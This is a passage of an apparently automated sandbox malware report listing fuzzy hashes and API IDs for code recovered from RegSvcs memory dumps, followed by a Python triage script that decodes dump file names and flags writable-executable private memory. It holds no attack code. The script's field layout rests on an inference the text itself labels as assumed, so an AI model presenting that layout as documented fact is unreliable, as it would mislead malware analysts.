                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: $R$T${
                                                                                            • API String ID: 0-4276472446
                                                                                            • Opcode ID: 1dd1dc67577360e7733d2347bab525281d4cfaa5fc4279677f922bc497e1a68b
                                                                                            • Instruction ID: ac84745b02a0cbf50cf7d1d70976398c0b22141d0a75525f1f84ba0b19c543c5
                                                                                            • Opcode Fuzzy Hash: 1dd1dc67577360e7733d2347bab525281d4cfaa5fc4279677f922bc497e1a68b
                                                                                            • Instruction Fuzzy Hash: 15A22C75E056298FDB64DF14CC887A9B7B5AF49314F2482EAD80DA7350DB30AE85EF01
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID: InitializeThunk
                                                                                            • String ID: $@
                                                                                            • API String ID: 2994545307-1077428164
                                                                                            • Opcode ID: 63596a5898475c00b3be180a0fe3d72ca345c14ab9c6aefffee34f8f4f7d11d0
                                                                                            • Instruction ID: 02f44fcdecdcabc629b84428960d21cc7a738b4f3c19c29e0cfa4740d70bf546
                                                                                            • Opcode Fuzzy Hash: 63596a5898475c00b3be180a0fe3d72ca345c14ab9c6aefffee34f8f4f7d11d0
                                                                                            • Instruction Fuzzy Hash: 9AC29172A1C3419FEB25DF24C841BABB7E5AF88714F14892EF989C7241D734D805EB92
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID: DebugPrintTimes
                                                                                            • String ID: kLsE
                                                                                            • API String ID: 3446177414-3058123920
                                                                                            • Opcode ID: 0786919e7305f9103d008a2ea28b71f0d16170568ec65c89e5f164dcfdcc1257
                                                                                            • Instruction ID: cab6196730b601a969f0349bc8aaf6e459d393dc9e37c4a92747057cae2330cc
                                                                                            • Opcode Fuzzy Hash: 0786919e7305f9103d008a2ea28b71f0d16170568ec65c89e5f164dcfdcc1257
                                                                                            • Instruction Fuzzy Hash: 9951AB71904746DBC724EF28C9406A7B7E4AF84314F04883EE9AE87281EB74E945DF92
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: @$@
                                                                                            • API String ID: 0-149943524
                                                                                            • Opcode ID: 3f2156b39b72b4c7d4bfa00a4bd3ea0aa912b3dfeef70c205a713f451ee1c42f
                                                                                            • Instruction ID: a68ccb417c3ebc16656292551e6384a4601503a3a40e45065922be92af674680
                                                                                            • Opcode Fuzzy Hash: 3f2156b39b72b4c7d4bfa00a4bd3ea0aa912b3dfeef70c205a713f451ee1c42f
                                                                                            • Instruction Fuzzy Hash: 0F92CC71A04345AFE760DF24C881B6BB7E8BF84760F04482DFA84D72A1D774E944EB92
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: `$`
                                                                                            • API String ID: 0-197956300
                                                                                            • Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                                                            • Instruction ID: ce46e4b37d87d8e013d08e69cdbf34dd620f862cbb7ce067a480a284ac79e695
                                                                                            • Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                                                            • Instruction Fuzzy Hash: 34C19C313043469BEB25CE28C841B6BBBE9AFC8318F084A6DF6D6CB291D775D505CB91
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: 6$8
                                                                                            • API String ID: 0-105715976
                                                                                            • Opcode ID: 6df4352d34cff2e79a48a2816dfff08329f2a40f1fd125c6a556fd9b1827059d
                                                                                            • Instruction ID: db54a79d3d0422bc867584164f773588708252765327a1cf989bfc6a52445559
                                                                                            • Opcode Fuzzy Hash: 6df4352d34cff2e79a48a2816dfff08329f2a40f1fd125c6a556fd9b1827059d
                                                                                            • Instruction Fuzzy Hash: FBC189715083828FC711CF18C544B6EB7E4BF84714F09896AF8998B261E779CA49EB93
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID: DebugPrintTimes
                                                                                            • String ID:
                                                                                            • API String ID: 3446177414-0
                                                                                            • Opcode ID: 9dad97bb087564c75613ba366f99e50b076b29da2716174f9e10720b160d3518
                                                                                            • Instruction ID: adec3ee36b37753a482a78c3f79573bbef1a76cef334ced5cb3d5a7288aedaa2
                                                                                            • Opcode Fuzzy Hash: 9dad97bb087564c75613ba366f99e50b076b29da2716174f9e10720b160d3518
                                                                                            • Instruction Fuzzy Hash: 3C22AE707066A1CBEB65CF2DC454376BBE1BF44300F08889AE9D68B28AD73DD552DB60
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 8718abc02b697b5bd2fea8b24ab09888f7440ca0c8a162200da31adca8f62ed0
                                                                                            • Instruction ID: 13bbaeefff496d34d84d4548e08d6c5b850975253f0a87352c2eef7bc8966525
                                                                                            • Opcode Fuzzy Hash: 8718abc02b697b5bd2fea8b24ab09888f7440ca0c8a162200da31adca8f62ed0
                                                                                            • Instruction Fuzzy Hash: 96328B71A00605DFDB25CF68C880BAAB7F2FF48310F24856AE959EB351D735AC41EB91
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: a458fb119adb1e6315ee747f8ff0dea5fe7c0a95dd8e2002c9eee899b5dfc409
                                                                                            • Instruction ID: 2e019467960ef2a9826a7fc7336cfaad282e880e1d66b22962a93d6d2dbb9f80
                                                                                            • Opcode Fuzzy Hash: a458fb119adb1e6315ee747f8ff0dea5fe7c0a95dd8e2002c9eee899b5dfc409
                                                                                            • Instruction Fuzzy Hash: 4BF1DF31B00A05DFDB24DF68C884BAAB7B6FF44710F248169E4569B391DB34ED85EB90
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID: DebugPrintTimes
                                                                                            • String ID:
                                                                                            • API String ID: 3446177414-0
                                                                                            • Opcode ID: aee0ebaf540824922077953dd2fd9976923fba291a11cde493e098b9415f760b
                                                                                            • Instruction ID: c6b7d2bd6f5f0e722813e1bb541f130143cf81d17a6ed0f059738a352a420a68
                                                                                            • Opcode Fuzzy Hash: aee0ebaf540824922077953dd2fd9976923fba291a11cde493e098b9415f760b
                                                                                            • Instruction Fuzzy Hash: 45D1E0316007A5DFDB22DF68C845AAEBBF1FF4A704F088099F5859B666C739D980DB10
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: b8827964e158724c7c0be760516d1fc627ae2ec4ebcbf778ed9810b2f9818a47
                                                                                            • Instruction ID: 5b7df569dd4010cf74d86d4e4a5fa41b8d43c7f9f678f0655298b74c23f53e99
                                                                                            • Opcode Fuzzy Hash: b8827964e158724c7c0be760516d1fc627ae2ec4ebcbf778ed9810b2f9818a47
                                                                                            • Instruction Fuzzy Hash: 44A12832E002589FEF21DB98CC44FAEB7B5AF00724F190126E951AB3D1D7789D44EB91
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID: ___swprintf_l
                                                                                            • String ID:
                                                                                            • API String ID: 48624451-0
                                                                                            • Opcode ID: 70cc7fcbd7559688d9577e810cda32bf55cd91facdb967b92659a5de8ce444c5
                                                                                            • Instruction ID: 71d74badbfa61a78bf512f82c957ecd1c95508752c4e600574018967353af6fa
                                                                                            • Opcode Fuzzy Hash: 70cc7fcbd7559688d9577e810cda32bf55cd91facdb967b92659a5de8ce444c5
                                                                                            • Instruction Fuzzy Hash: 3F714D72E0114A9FDB01EF98C991BEEB7F9AF08744F144065E905E7252EB38EE05DB60
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Strings
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: @
                                                                                            • API String ID: 0-2766056989
                                                                                            • Opcode ID: 5288463be45af12578a698e3eed17e1e93ba014672dc1ae08dec388deb83c524
                                                                                            • Instruction ID: b07b2b62d0bfc6a1c20a2987efb6c4b4efc490285c76ace812f14159b0b2c607
                                                                                            • Opcode Fuzzy Hash: 5288463be45af12578a698e3eed17e1e93ba014672dc1ae08dec388deb83c524
                                                                                            • Instruction Fuzzy Hash: 740262F2D002689BDB71DB15CC81BDDB7B8AF45724F0041EAA609A7241EB349F84EF59

                                                                                            APIs
                                                                                            • RtlDebugPrintTimes.NTDLL ref: 00F6656C
                                                                                              • Part of subcall function 00F665B5: RtlDebugPrintTimes.NTDLL ref: 00F66664
                                                                                              • Part of subcall function 00F665B5: RtlDebugPrintTimes.NTDLL ref: 00F666AF
                                                                                            Similarity
                                                                                            • API ID: DebugPrintTimes
                                                                                            • String ID:
                                                                                            • API String ID: 3446177414-0
                                                                                            • Opcode ID: ddf528e98ac3cb556f85194c68308ba0d6dbc57270953485627bd1b6decf2b11
                                                                                            • Instruction ID: 35949154688e75eb75821a6c58d8f0d398e7fd32b7bc4729258e3d56bb397e5f
                                                                                            • Opcode Fuzzy Hash: ddf528e98ac3cb556f85194c68308ba0d6dbc57270953485627bd1b6decf2b11
                                                                                            • Instruction Fuzzy Hash: 4C51AEB12083019FD320DF24DD46FAB77E4BB84754F14091DF9869B1A1DA79E904AB92

                                                                                            Similarity
                                                                                            • API ID: DebugPrintTimes
                                                                                            • String ID:
                                                                                            • API String ID: 3446177414-0
                                                                                            • Opcode ID: 5fa2e515d68565d17b6f2b000da23abd61735673b0f6487ad364d97c82315ba6
                                                                                            • Instruction ID: 3a262e8b87325d03268a94446f118c43ca641cf6be3127210c80acaf5594b47e
                                                                                            • Opcode Fuzzy Hash: 5fa2e515d68565d17b6f2b000da23abd61735673b0f6487ad364d97c82315ba6
                                                                                            • Instruction Fuzzy Hash: 0F41C4B1544304ABC730EB64DD45B5B77E8EF49B60F04452AF988D7261EB79EC00ABD1

                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: b185a4c77535f5debc91b1e414bd9f32f28e2be01b638f676cae4c08d106660a
                                                                                            • Instruction ID: ec6afddbebefce271f9b7664ef2bbf0cf64251a8fdaf9e5cd24944a3d91ebc4b
                                                                                            • Opcode Fuzzy Hash: b185a4c77535f5debc91b1e414bd9f32f28e2be01b638f676cae4c08d106660a
                                                                                            • Instruction Fuzzy Hash: 8E4182726043019FEB24DF24C840A5AB7E6FF48324F14492AE597C7712DB35E848EB51

                                                                                            Similarity
                                                                                            • API ID: DebugPrintTimes
                                                                                            • String ID:
                                                                                            • API String ID: 3446177414-0
                                                                                            • Opcode ID: 307e73f734788ce9bb7f423b542bb0593cdf47ef27834e17d82924ab98f4d6ec
                                                                                            • Instruction ID: 0a4f12766ef6c6d813ef3c896015712b9df9d3da158eb050a71e51b501528e16
                                                                                            • Opcode Fuzzy Hash: 307e73f734788ce9bb7f423b542bb0593cdf47ef27834e17d82924ab98f4d6ec
                                                                                            • Instruction Fuzzy Hash: DC419171901700CFCB65EF24CA41B55B7F6FF44320F10C26BD44A9B2A1EB34A941EB52

                                                                                            Similarity
                                                                                            • API ID: DebugPrintTimes
                                                                                            • String ID:
                                                                                            • API String ID: 3446177414-0
                                                                                            • Opcode ID: 2347b69f5db6a4a23d98f54e3e8192590228dd12efb6a463433f3dd4df557e3f
                                                                                            • Instruction ID: 13b35919e9b1c6abe52f1a278a6883026137614608c406b8dc6244ee70542576
                                                                                            • Opcode Fuzzy Hash: 2347b69f5db6a4a23d98f54e3e8192590228dd12efb6a463433f3dd4df557e3f
                                                                                            • Instruction Fuzzy Hash: 2B4190B15043059BD720DF24C845BABBBE8FF88760F004A2EF598C7291DB749804DB92

                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 46586d1965132bd6a90c2527484954702af166c3b702faf8fef12ced554af14a
                                                                                            • Instruction ID: dffb4903c0f0a9bfaec11b9029a92611717c819f05e5e9d2068fdf3e622350d3
                                                                                            • Opcode Fuzzy Hash: 46586d1965132bd6a90c2527484954702af166c3b702faf8fef12ced554af14a
                                                                                            • Instruction Fuzzy Hash: A6317B72A00201EFDB30DF69DC81A6A77B5FB80B14F29011AF9456B365C7799C41E782

                                                                                            Similarity
                                                                                            • API ID: DebugPrintTimes
                                                                                            • String ID:
                                                                                            • API String ID: 3446177414-0
                                                                                            • Opcode ID: a0541abbb0a2334d2176d7e021b101f49a5cbe0c38fa89adbeee8e444a6901b7
                                                                                            • Instruction ID: f766902cc19744e5aafd42a20277425acb81bc9b381cd9ab39a21efdf9b9149a
                                                                                            • Opcode Fuzzy Hash: a0541abbb0a2334d2176d7e021b101f49a5cbe0c38fa89adbeee8e444a6901b7
                                                                                            • Instruction Fuzzy Hash: 6641D6716003058BC725DF18D844B27B7F9EF81760F14842EF6598B2A1DB75ED41DB52

                                                                                            Similarity
                                                                                            • API ID: DebugPrintTimes
                                                                                            • String ID:
                                                                                            • API String ID: 3446177414-0
                                                                                            • Opcode ID: dc3aad5e3dc51fc6fac0c6cce727747ab80c20c8007365adbc3bed547e7bb0f3
                                                                                            • Instruction ID: d1d3686f32ae2a8a1604d53e3d28c076bb37c7cabac8ef6a8edc801a809519f5
                                                                                            • Opcode Fuzzy Hash: dc3aad5e3dc51fc6fac0c6cce727747ab80c20c8007365adbc3bed547e7bb0f3
                                                                                            • Instruction Fuzzy Hash: 72317C715053068FC712EF19C94085ABBF5FF89614F0449AEE8C89B256D3359945CB92

                                                                                            Similarity
                                                                                            • API ID: DebugPrintTimes
                                                                                            • String ID:
                                                                                            • API String ID: 3446177414-0
                                                                                            • Opcode ID: e887c186995ab8b698c2b7246de6ee2983873680522a0b92b72dfed1362430f0
                                                                                            • Instruction ID: 989621099ad7f9a851f098fde657534d9ce3c57caea954598fcfbc69b8c07dfd
                                                                                            • Opcode Fuzzy Hash: e887c186995ab8b698c2b7246de6ee2983873680522a0b92b72dfed1362430f0
                                                                                            • Instruction Fuzzy Hash: 6231E4B6A00606EFCB11DFA0DA41BADB7B0BF48310F14425EEC0257651CB39A951FBA1

                                                                                            Similarity
                                                                                            • API ID: DebugPrintTimes
                                                                                            • String ID:
                                                                                            • API String ID: 3446177414-0
                                                                                            • Opcode ID: 28b6d82724ef4aa066e22ded2b7ed831c18e148f58d14c504f4de301c80a0663
                                                                                            • Instruction ID: dbe9bf16770569d04acb38cb29eebb7e19884224bc945be01328d46d229ce2f4
                                                                                            • Opcode Fuzzy Hash: 28b6d82724ef4aa066e22ded2b7ed831c18e148f58d14c504f4de301c80a0663
                                                                                            • Instruction Fuzzy Hash: 6511C276200A119FD7629A29DC84F66B7E6FFC4710F154579EAC2C7690DA30E802CBD0
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%
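Every function entry above points at the same set of `.sdmp` memory dumps from process 8 (the RegSvcs host), all reported with "Offset: 00F40000, based on PE: true". The dump file names encode the region attributes, so a practitioner triaging the report can check, without opening IDA, whether these dumps describe a normally mapped image or writable, executable private memory of the kind an injected payload leaves behind. The following decoder is an added example, not part of the Joe Sandbox report or its tooling. The field layout it assumes (pid.stage.dumpid.base.protect.state.type.reserved) is inferred from the names on this page and is not documented here; the protection, state and type constants are the standard winnt.h values used by MEMORY_BASIC_INFORMATION, and the sample list is constructed from the names that appear in this section.

```python
"""Decode Joe Sandbox-style .sdmp memory dump file names into region attributes.

Added example; not code from the report or from Joe Sandbox. The field layout
below is an ASSUMPTION inferred from the names on this page:
    pid.stage.dumpid.base.protect.state.type.reserved.sdmp
"""
import re
from dataclasses import dataclass

# Constructed sample: the dump names listed on this page for process 8 (RegSvcs).
SAMPLE_DUMPS = [
    "00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp",
    "00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmp",
    "00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmp",
    "00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmp",
    "00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmp",
    "00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmp",
]

# winnt.h memory constants. The base page protection lives in the low byte;
# PAGE_GUARD / PAGE_NOCACHE / PAGE_WRITECOMBINE are OR'd modifier bits.
PAGE_PROTECT = {
    0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY",
}
PAGE_MODIFIERS = {0x100: "PAGE_GUARD", 0x200: "PAGE_NOCACHE", 0x400: "PAGE_WRITECOMBINE"}
MEM_STATE = {0x1000: "MEM_COMMIT", 0x2000: "MEM_RESERVE", 0x10000: "MEM_FREE"}
MEM_TYPE = {0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED", 0x1000000: "MEM_IMAGE"}

# Assumed name layout (see module docstring); pid/stage/base/flags are hex, dumpid decimal.
_NAME_RE = re.compile(
    r"^(?P<pid>[0-9a-f]{8})\.(?P<stage>[0-9a-f]{8})\.(?P<dump_id>\d+)\."
    r"(?P<base>[0-9a-f]{16})\.(?P<protect>[0-9a-f]{8})\.(?P<state>[0-9a-f]{8})\."
    r"(?P<type>[0-9a-f]{8})\.(?P<reserved>[0-9a-f]{8})\.sdmp$",
    re.IGNORECASE,
)


@dataclass(frozen=True)
class DumpRegion:
    pid: int
    stage: int
    dump_id: int
    base: int
    protect: int
    state: int
    mem_type: int

    @property
    def protect_name(self) -> str:
        names = [PAGE_PROTECT.get(self.protect & 0xFF, f"0x{self.protect & 0xFF:x}")]
        names += [n for bit, n in PAGE_MODIFIERS.items() if self.protect & bit]
        return "|".join(names)

    @property
    def state_name(self) -> str:
        return MEM_STATE.get(self.state, f"0x{self.state:x}")

    @property
    def type_name(self) -> str:
        return MEM_TYPE.get(self.mem_type, f"0x{self.mem_type:x}")

    def is_writable_executable_private(self) -> bool:
        """Committed, private (not image-backed) memory that is both writable and
        executable: the shape unpacked or injected code typically has, as opposed
        to a legitimately mapped module (MEM_IMAGE with PAGE_EXECUTE_READ code)."""
        rwx = (self.protect & 0xFF) in (0x40, 0x80)
        return rwx and self.state == 0x1000 and self.mem_type == 0x20000


def parse_sdmp_name(name: str) -> DumpRegion:
    """Split one .sdmp file name into its (assumed) fields."""
    m = _NAME_RE.match(name)
    if not m:
        raise ValueError(f"not a recognised .sdmp name: {name}")
    return DumpRegion(
        pid=int(m["pid"], 16), stage=int(m["stage"], 16), dump_id=int(m["dump_id"]),
        base=int(m["base"], 16), protect=int(m["protect"], 16),
        state=int(m["state"], 16), mem_type=int(m["type"], 16),
    )


def summarize(names) -> dict:
    """Triage a set of associated dumps: confirm they come from one process, report the
    address span they cover, and whether every region is RWX private memory."""
    regions = [parse_sdmp_name(n) for n in names]
    pids = {r.pid for r in regions}
    if len(pids) != 1:
        raise ValueError(f"dumps span several processes: {sorted(pids)}")
    return {
        "pid": pids.pop(),
        "lowest_base": min(r.base for r in regions),
        "highest_base": max(r.base for r in regions),
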